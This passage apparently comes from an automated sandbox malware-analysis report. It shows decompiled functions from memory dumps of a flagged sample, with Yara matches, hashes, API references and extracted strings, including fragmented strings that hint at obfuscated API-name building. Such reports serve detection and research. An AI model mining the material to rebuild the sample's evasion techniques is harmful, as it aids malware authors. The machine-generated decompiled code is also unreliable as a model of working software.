				E00418D80(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                    0x004184d3
                                                                                                                                    0x004184ea
                                                                                                                                    0x004184f8

                                                                                                                                    APIs
                                                                                                                                    • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 004184F8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                    • Instruction ID: 9f0e6789d667daaae8a14a3bb2a3edfd4f0b4b377582a99054e252b8191c9f04
                                                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                    • Instruction Fuzzy Hash: 06D012716403187BD620EF99DC85FD7779CDF49750F058069FA1C5B241C531BA0086E1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0041848E, Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408AC3,?,?,00408AC3,00000060,00000000,00000000,?,?,00408AC3,?,00000000), ref: 004184BD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FreeHeap
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                    • Opcode ID: 6062f7686c8fb5a5abbf25aa85ca95b958e668f21b859597e5dc77652ec35e2f
                                                                                                                                    • Instruction ID: 3da6c816bf1d7fdf4f17990414456f5dd4c2b75c59805ffdefcdbb4b307434e1
                                                                                                                                    • Opcode Fuzzy Hash: 6062f7686c8fb5a5abbf25aa85ca95b958e668f21b859597e5dc77652ec35e2f
                                                                                                                                    • Instruction Fuzzy Hash: 89E0CDF41043845FDB14FF59D8C08977794FF81314710855EE85947206C531D559CBB1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B7967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: c17b56a11caa1b848d25c4d961a83f13afb79d5ed2f3e422d19265ae77494def
                                                                                                                                    • Instruction ID: 2876152681d14327c19eecd38fedd4012ecb3c6344f4c12058b0025718538157
                                                                                                                                    • Opcode Fuzzy Hash: c17b56a11caa1b848d25c4d961a83f13afb79d5ed2f3e422d19265ae77494def
                                                                                                                                    • Instruction Fuzzy Hash: A3B09BB29014C5C5F711E7604608F177904F7E0745F16C196D1121645A4778D091F5B5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Non-executed Functions

                                                                                                                                    Function 04BEB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    • read from, xrefs: 04BEB4AD, 04BEB4B2
                                                                                                                                    • The resource is owned shared by %d threads, xrefs: 04BEB37E
                                                                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04BEB484
                                                                                                                                    • The instruction at %p referenced memory at %p., xrefs: 04BEB432
                                                                                                                                    • *** enter .cxr %p for the context, xrefs: 04BEB50D
                                                                                                                                    • *** enter .exr %p for the exception record, xrefs: 04BEB4F1
                                                                                                                                    • The resource is owned exclusively by thread %p, xrefs: 04BEB374
                                                                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04BEB476
                                                                                                                                    • The instruction at %p tried to %s , xrefs: 04BEB4B6
                                                                                                                                    • Go determine why that thread has not released the critical section., xrefs: 04BEB3C5
                                                                                                                                    • *** Inpage error in %ws:%s, xrefs: 04BEB418
                                                                                                                                    • This failed because of error %Ix., xrefs: 04BEB446
                                                                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04BEB305
                                                                                                                                    • *** then kb to get the faulting stack, xrefs: 04BEB51C
                                                                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 04BEB48F
                                                                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04BEB53F
                                                                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04BEB38F
                                                                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04BEB47D
                                                                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04BEB2F3
                                                                                                                                    • an invalid address, %p, xrefs: 04BEB4CF
                                                                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 04BEB352
                                                                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04BEB314
                                                                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04BEB2DC
                                                                                                                                    • a NULL pointer, xrefs: 04BEB4E0
                                                                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04BEB3D6
                                                                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04BEB323
                                                                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04BEB39B
                                                                                                                                    • <unknown>, xrefs: 04BEB27E, 04BEB2D1, 04BEB350, 04BEB399, 04BEB417, 04BEB48E
                                                                                                                                    • write to, xrefs: 04BEB4A6
                                                                                                                                    • The critical section is owned by thread %p., xrefs: 04BEB3B9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                    • API String ID: 0-108210295
                                                                                                                                    • Opcode ID: 357860330c9e197e2dcfa66ba5841bfb96747196e6080ec59ed91260b4b5224e
                                                                                                                                    • Instruction ID: d2083c5fa3328013991504ef3cb3afe06126cabff0d67c11e97ed521d4d2d2c8
                                                                                                                                    • Opcode Fuzzy Hash: 357860330c9e197e2dcfa66ba5841bfb96747196e6080ec59ed91260b4b5224e
                                                                                                                                    • Instruction Fuzzy Hash: 7981F975644220FFEB21AA0ACD8AD7B3B3AEF86756F4040C9F5082B122D361F551DB76
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04BF1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 44%
                                                                                                                                    			E04BF1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x4b148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04B3B150();
				} else {
					E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x4c2589c);
				E04B3B150("Heap error detected at %p (heap handle %p)\n",  *0x4c258a0);
				_t27 =  *0x4c25898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M04BF1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04B3B150();
				} else {
					E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E04B3B150("Error code: %d - %s\n",  *0x4c25898);
				_t113 =  *0x4c258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B3B150();
					} else {
						E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04B3B150("Parameter1: %p\n",  *0x4c258a4);
				}
				_t115 =  *0x4c258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B3B150();
					} else {
						E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04B3B150("Parameter2: %p\n",  *0x4c258a8);
				}
				_t117 =  *0x4c258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B3B150();
					} else {
						E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E04B3B150("Parameter3: %p\n",  *0x4c258ac);
				}
				_t119 =  *0x4c258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E04B3B150();
					} else {
						E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x4c258b4);
					E04B3B150("Last known valid blocks: before - %p, after - %p\n",  *0x4c258b0);
				} else {
					_t120 =  *0x4c258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E04B3B150();
				} else {
					E04B3B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E04B3B150("Stack trace available at %p\n", 0x4c258c0);
			}











                                                                                                                                    0x04bf1c10
                                                                                                                                    0x04bf1c16
                                                                                                                                    0x04bf1c1e
                                                                                                                                    0x04bf1c3d
                                                                                                                                    0x04bf1c3e
                                                                                                                                    0x04bf1c20
                                                                                                                                    0x04bf1c35
                                                                                                                                    0x04bf1c3a
                                                                                                                                    0x04bf1c44
                                                                                                                                    0x04bf1c55
                                                                                                                                    0x04bf1c5a
                                                                                                                                    0x04bf1c65
                                                                                                                                    0x04bf1c67
                                                                                                                                    0x00000000
                                                                                                                                    0x04bf1c6e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04bf1c67
                                                                                                                                    0x04bf1cdc
                                                                                                                                    0x04bf1ce5
                                                                                                                                    0x04bf1d04
                                                                                                                                    0x04bf1d05
                                                                                                                                    0x04bf1ce7
                                                                                                                                    0x04bf1cfc
                                                                                                                                    0x04bf1d01
                                                                                                                                    0x04bf1d0b
                                                                                                                                    0x04bf1d17
                                                                                                                                    0x04bf1d1f
                                                                                                                                    0x04bf1d25
                                                                                                                                    0x04bf1d30
                                                                                                                                    0x04bf1d4f
                                                                                                                                    0x04bf1d50
                                                                                                                                    0x04bf1d32
                                                                                                                                    0x04bf1d47
                                                                                                                                    0x04bf1d4c
                                                                                                                                    0x04bf1d61
                                                                                                                                    0x04bf1d67
                                                                                                                                    0x04bf1d68
                                                                                                                                    0x04bf1d6e
                                                                                                                                    0x04bf1d79
                                                                                                                                    0x04bf1d98
                                                                                                                                    0x04bf1d99
                                                                                                                                    0x04bf1d7b
                                                                                                                                    0x04bf1d90
                                                                                                                                    0x04bf1d95
                                                                                                                                    0x04bf1daa
                                                                                                                                    0x04bf1db0
                                                                                                                                    0x04bf1db1
                                                                                                                                    0x04bf1db7
                                                                                                                                    0x04bf1dc2
                                                                                                                                    0x04bf1de1
                                                                                                                                    0x04bf1de2
                                                                                                                                    0x04bf1dc4
                                                                                                                                    0x04bf1dd9
                                                                                                                                    0x04bf1dde
                                                                                                                                    0x04bf1df3
                                                                                                                                    0x04bf1df9
                                                                                                                                    0x04bf1dfa
                                                                                                                                    0x04bf1e00
                                                                                                                                    0x04bf1e0a
                                                                                                                                    0x04bf1e13
                                                                                                                                    0x04bf1e32
                                                                                                                                    0x04bf1e33
                                                                                                                                    0x04bf1e15
                                                                                                                                    0x04bf1e2a
                                                                                                                                    0x04bf1e2f
                                                                                                                                    0x04bf1e39
                                                                                                                                    0x04bf1e4a
                                                                                                                                    0x04bf1e02
                                                                                                                                    0x04bf1e02
                                                                                                                                    0x04bf1e08
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04bf1e08
                                                                                                                                    0x04bf1e5b
                                                                                                                                    0x04bf1e7a
                                                                                                                                    0x04bf1e7b
                                                                                                                                    0x04bf1e5d
                                                                                                                                    0x04bf1e72
                                                                                                                                    0x04bf1e77
                                                                                                                                    0x04bf1e95

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.737896933.0000000004B10000.00000040.00000001.sdmp, Offset: 04B10000, based on PE: true
                                                                                                                                    • Associated: 00000002.00000002.740461085.0000000004C2B000.00000040.00000001.sdmp Download File
                                                                                                                                    • Associated: 00000002.00000002.740478867.0000000004C2F000.00000040.00000001.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                                                                                    • API String ID: 0-2897834094
                                                                                                                                    • Opcode ID: 7584d7b1be7a12ce0b200817113b790b03c5f42e32fcb27c8cfbb99aa7bb0c08
                                                                                                                                    • Instruction ID: 86a1ac01667e9856b3dd97735529b04dae19e383adf5a1d62dd8f50cc9fdd294
                                                                                                                                    • Opcode Fuzzy Hash: 7584d7b1be7a12ce0b200817113b790b03c5f42e32fcb27c8cfbb99aa7bb0c08
                                                                                                                                    • Instruction Fuzzy Hash: 7F61323B674551DFE2119B8EDA84E2533A4EB00A31B0888EBF60D5F315E6B4FC559E0A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00802C5D, Relevance: 26.5, Strings: 21, Instructions: 267COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.729908572.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: A$P$P$R$T$Vi$Vi$Z$Zw$c$mina$mo$msi$o$oM$oc$oc$ss$ua$ua$y
                                                                                                                                    • API String ID: 0-2990349263
                                                                                                                                    • Opcode ID: 2c4eb0efb3224e5c3ff9a369fc8e3c2221b6254002007da644927c78682e5486
                                                                                                                                    • Instruction ID: f76f8dfd024ae77b377e6fbb8ebfd48c9a71240879913d6ef0dbadf860860e01
                                                                                                                                    • Opcode Fuzzy Hash: 2c4eb0efb3224e5c3ff9a369fc8e3c2221b6254002007da644927c78682e5486
                                                                                                                                    • Instruction Fuzzy Hash: D1B1687211D3809EE361CB688845B9FBBE4FF95704F04491EF5C887292E7B58648CB67
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04B3B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                    			E04B3B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x4c0f7a8);
				E04B8D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E04B8D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E04B7D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E04B7F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L04B8DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E04B7B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E04B7B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E04B7E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E04B7A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                                    0x04b3b171
                                                                                                                                    0x04b3b171
                                                                                                                                    0x04b3b171
                                                                                                                                    0x04b3b171
                                                                                                                                    0x04b3b171
                                                                                                                                    0x04b3b176
                                                                                                                                    0x04b3b17b
                                                                                                                                    0x04b3b180
                                                                                                                                    0x04b3b186
                                                                                                                                    0x04b3b18f
                                                                                                                                    0x04b3b198
                                                                                                                                    0x04b3b1a4
                                                                                                                                    0x04b3b1aa
                                                                                                                                    0x04b94802
                                                                                                                                    0x04b94802
                                                                                                                                    0x04b94805
                                                                                                                                    0x04b9480c
                                                                                                                                    0x04b9480e
                                                                                                                                    0x04b3b1d1
                                                                                                                                    0x04b3b1d3
                                                                                                                                    0x04b3b1de
                                                                                                                                    0x04b3b1de
                                                                                                                                    0x04b94817
                                                                                                                                    0x04b9481e
                                                                                                                                    0x04b94820
                                                                                                                                    0x04b94822
                                                                                                                                    0x04b94822
                                                                                                                                    0x04b94824
                                                                                                                                    0x04b94824
                                                                                                                                    0x04b9482a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x04b94835
                                                                                                                                    0x04b9483a
                                                                                                                                    0x04b9483d
                                                                                                                                    0x04b9483f
                                                                                                                                    0x04b94842
                                                                                                                                    0x04b94842
                                                                                                                                    0x04b94842
                                                                                                                                    0x04b94846
                                                                                                                                    0x04b9484c
                                                                                                                                    0x04b9484e
                                                                                                                                    0x04b94851
                                                                                                                                    0x04b94851
                                                                                                                                    0x04b94853
                                                                                                                                    0x04b94854
                                                                                                                                    0x04b94854
                                                                                                                                    0x04b94858
                                                                                                                                    0x04b9485a
                                                                                                                                    0x04b9485a
                                                                                                                                    0x04b9485d
                                                                                                                                    0x04b9485f
                                                                                                                                    0x04b94861
                                                                                                                                    0x04b94861
                                                                                                                                    0x04b94866
                                                                                                                                    0x04b9486b
                                                                                                                                    0x04b9486e
                                                                                                                                    0x04b94871
                                                                                                                                    0x04b94876
                                                                                                                                    0x04b94876
                                                                                                                                    0x04b94878
                                                                                                                                    0x04b9487b
                                                                                                                                    0x04b94884
                                                                                                                                    0x04b94884
                                                                                                                                    0x00000000
                                                                                                                                    0x04b9487d
                                                                                                                                    0x04b9487d
                                                                                                                                    0x04b94882
                                                                                                                                    0x04b94889
                                                                                                                                    0x04b94889
                                                                                                                                    0x04b9488f
                                                                                                                                    0x04b94891
                                                                                                                                    0x04b948e0
                                                                                                                                    0x04b948e2
                                                                                                                                    0x04b948e4
                                                                                                                                    0x04b948e4
                                                                                                                                    0x04b948e7
                                                                                                                                    0x04b948e7
                                                                                                                                    0x04b948ed
                                                                                                                                    0x04b948f4
                                                                                                                                    0x04b948f6
                                                                                                                                    0x04b94951
                                                                                                                                    0x04b94951
                                                                                                                                    0x04b94953
                                                                                                                                    0x04b94953
                                                                                                                                    0x04b94956
                                                                                                                                    0x04b94956
                                                                                                                                    0x04b94958
                                                                                                                                    0x04b94959
                                                                                                                                    0x04b94959
                                                                                                                                    0x04b9495d
                                                                                                                                    0x04b9495d
                                                                                                                                    0x04b9495f
                                                                                                                                    0x04b9495f
                                                                                                                                    0x04b94965
                                                                                                                                    0x04b94969
                                                                                                                                    0x04b949ba
                                                                                                                                    0x04b949ba
                                                                                                                                    0x04b949c1
                                                                                                                                    0x04b949c5
                                                                                                                                    0x04b949cc
                                                                                                                                    0x04b949d4
                                                                                                                                    0x04b949d7
                                                                                                                                    0x04b949da
                                                                                                                                    0x04b949e4
                                                                                                                                    0x04b949e5
                                                                                                                                    0x04b949f3
                                                                                                                                    0x04b94a02
                                                                                                                                    0x00000000
